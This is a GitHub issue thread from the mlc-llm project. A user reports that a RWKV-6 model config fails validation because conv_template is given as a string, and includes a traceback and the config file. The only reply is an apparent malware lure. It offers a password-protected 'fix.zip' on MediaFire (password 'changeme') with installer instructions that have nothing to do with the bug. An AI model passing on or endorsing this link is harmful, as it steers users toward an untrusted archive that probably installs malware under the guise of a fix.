### ISSUE TITLE
[Bug] ValidationError: 1 validation error for MLCChatConfig conv_template  Input should be an object

### ISSUE THREAD

**Issue by loredunk** [mlc-ai/mlc-llm#2863]
## To Reproduce

I have followed the configuration and model files published by Siyuan on Hugging Face, but after running the local Siyuan/rwkv-6-world-3b-q4f16_2-MLC of mlc-llm chat, there is a requirement that the input of conv_template must be an object. How should I write it if I do not write "rwkv_world"? By the way, the conv_template list in your official provided docs is already 404.

``` bash
(mlcllm) gavin@gavin-System-Product-Name:~/.cache/mlc_llm/model_lib$ mlc_llm chat /home/gavin/.cache/mlc_llm/model_weights/hf/Siyuan/rwkv-6-world-3b-q4f16_2-MLC
[2024-08-29 10:51:12] INFO auto_device.py:79: Found device: cuda:0
[2024-08-29 10:51:12] INFO auto_device.py:79: Found device: cuda:1
[2024-08-29 10:51:12] INFO auto_device.py:88: Not found device: rocm:0
[2024-08-29 10:51:13] INFO auto_device.py:88: Not found device: metal:0
[2024-08-29 10:51:14] INFO auto_device.py:79: Found device: vulkan:0
[2024-08-29 10:51:14] INFO auto_device.py:79: Found device: vulkan:1
[2024-08-29 10:51:14] INFO auto_device.py:88: Not found device: opencl:0
[2024-08-29 10:51:14] INFO auto_device.py:35: Using device: cuda:0
Traceback (most recent call last):
  File "/home/gavin/miniconda3/envs/mlcllm/bin/mlc_llm", line 8, in <module>
    sys.exit(main())
             ^^^^^^
  File "/home/gavin/miniconda3/envs/mlcllm/lib/python3.11/site-packages/mlc_llm/__main__.py", line 45, in main
    cli.main(sys.argv[2:])
  File "/home/gavin/miniconda3/envs/mlcllm/lib/python3.11/site-packages/mlc_llm/cli/chat.py", line 36, in main
    chat(
  File "/home/gavin/miniconda3/envs/mlcllm/lib/python3.11/site-packages/mlc_llm/interface/chat.py", line 285, in chat
    JSONFFIEngine(
  File "/home/gavin/miniconda3/envs/mlcllm/lib/python3.11/site-packages/mlc_llm/json_ffi/engine.py", line 232, in __init__
    model_args = _process_model_args(models, device, engine_config)[0]
                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/gavin/miniconda3/envs/mlcllm/lib/python3.11/site-packages/mlc_llm/serve/engine_base.py", line 171, in _process_model_args
    model_args: List[Tuple[str, str]] = [_convert_model_info(model) for model in models]
                                        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/gavin/miniconda3/envs/mlcllm/lib/python3.11/site-packages/mlc_llm/serve/engine_base.py", line 171, in <listcomp>
    model_args: List[Tuple[str, str]] = [_convert_model_info(model) for model in models]
                                         ^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/gavin/miniconda3/envs/mlcllm/lib/python3.11/site-packages/mlc_llm/serve/engine_base.py", line 130, in _convert_model_info
    mlc_chat_config = MLCChatConfig.model_validate_json(file.read())
                      ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/gavin/miniconda3/envs/mlcllm/lib/python3.11/site-packages/pydantic/main.py", line 597, in model_validate_json
    return cls.__pydantic_validator__.validate_json(json_data, strict=strict, context=context)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
pydantic_core._pydantic_core.ValidationError: 1 validation error for MLCChatConfig
conv_template
  Input should be an object [type=model_type, input_value='rwkv_world', input_type=str]
    For further information visit https://errors.pydantic.dev/2.8/v/model_type

```
##  mlc-chat-config.json
https://huggingface.co/Siyuan/rwkv-6-world-3b-q4f16_2-MLC/blob/main/mlc-chat-config.json

```
{
  "model_type": "rwkv6",
  "quantization": "q4f16_2",
  "model_config": {
    "hidden_size": 2560,
    "intermediate_size": 8960,
    "num_hidden_layers": 32,
    "vocab_size": 65536,
    "model_version": "6_0",
    "tensor_parallel_shards": 1,
    "rescale_every": 6,
    "head_size": 64,
    "layer_norm_epsilon": 1e-05,
    "context_window_size": -1,
    "prefill_chunk_size": 4096,
    "num_heads": 40
  },
  "vocab_size": 65536,
  "context_window_size": -1,
  "sliding_window_size": -1,
  "prefill_chunk_size": 4096,
  "attention_sink_size": -1,
  "tensor_parallel_shards": 1,
  "mean_gen_len": 128,
  "max_gen_len": 512,
  "shift_fill_factor": 0.3,
  "temperature": 0.7,
  "presence_penalty": 0.0,
  "frequency_penalty": 0.0,
  "repetition_penalty": 1.0,
  "top_p": 0.95,
  "conv_template": "rwkv_world",
  "pad_token_id": 0,
  "bos_token_id": 0,
  "eos_token_id": 0,
  "tokenizer_files": [
    "tokenizer_model"
  ],
  "version": "0.1.0"
}
```

## Environment

 - Platform (CUDA):
 - Operating system (Ubuntu):
 - Device (PC+RTX 3090)
 - How you installed MLC-LLM (source):
 - How you installed TVM-Unity (source):
 - Python version (e.g. 3.11):

**Comment by Kudjo-Grand** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."
